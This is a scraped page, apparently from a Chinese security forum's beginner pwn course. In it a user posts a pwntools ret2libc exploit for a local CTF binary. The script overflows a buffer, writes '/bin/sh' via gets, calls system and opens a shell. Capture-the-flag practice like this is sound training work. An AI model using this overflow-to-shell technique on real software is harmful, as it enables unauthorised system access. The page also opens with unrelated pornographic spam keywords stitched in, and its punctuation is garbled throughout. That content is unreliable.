亚洲乱码一卡二卡四卡乱码新区_亚洲乱码中文字幕小综合_亚洲人成电影在线播放_亚洲性色AV一区二区三区_亚洲一区二区三区影院_亚洲中文字幕久久精品无码A_亚洲中文字幕无码专区_伊人热热久久原色播放WWW_在线观看AV永久免费_最新欧洲大片免费在线,欧美日韩成人三级免费看,久久黄色网址,欧美激情内射喷水高潮

首頁(yè)
社區(qū)
課程
招聘
經(jīng)過(guò)兩個(gè)小時(shí)的調(diào)試,。,。我終于找到了不需要 pop ;ret的方法,,少了個(gè)局限性,。

提問(wèn)者:
hack_xolin 2021-4-11
經(jīng)過(guò)兩個(gè)小時(shí)的調(diào)試。,。我終于找到了不需要 pop ,;ret的方法,少了個(gè)局限性,。
EXP如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
from  pwn  import  *
 
context.log_level  =  "debug"
=  process("./ret2libc2_last")
=  ELF("./ret2libc2_last")
 
systemAddr  =  e.symbols["system"]
getsAddr  =  e.plt["gets"]
offset  =  112
binAddr  =  0x804b000  -  0x10
 
payload  =  offset  *  "A"  +  p32(getsAddr)  +  p32(systemAddr)  +  p32(binAddr)  +  p32(binAddr)
pause()
p.sendlineafter("What  do  you  think  ?",  payload)
 
p.sendline("/bin/sh\x00")
p.interactive()
收藏
0條回答
零基礎(chǔ)入門(mén)pwn
  參與學(xué)習(xí)     1818 人
  提問(wèn)次數(shù)     36 個(gè)
《零基礎(chǔ)入門(mén)pwn》,短時(shí)間內(nèi)踏入漏洞利用的大門(mén),,快速成為一名合格的pwn題選手
學(xué)習(xí)課程
我的問(wèn)答 領(lǐng)取收益
0
我的提問(wèn)
0
我的回答
0
學(xué)習(xí)收益
?2000 - 2025 看雪 / 滬ICP備2022023406號(hào) / 滬公網(wǎng)安備 31011502006611號(hào)

郵件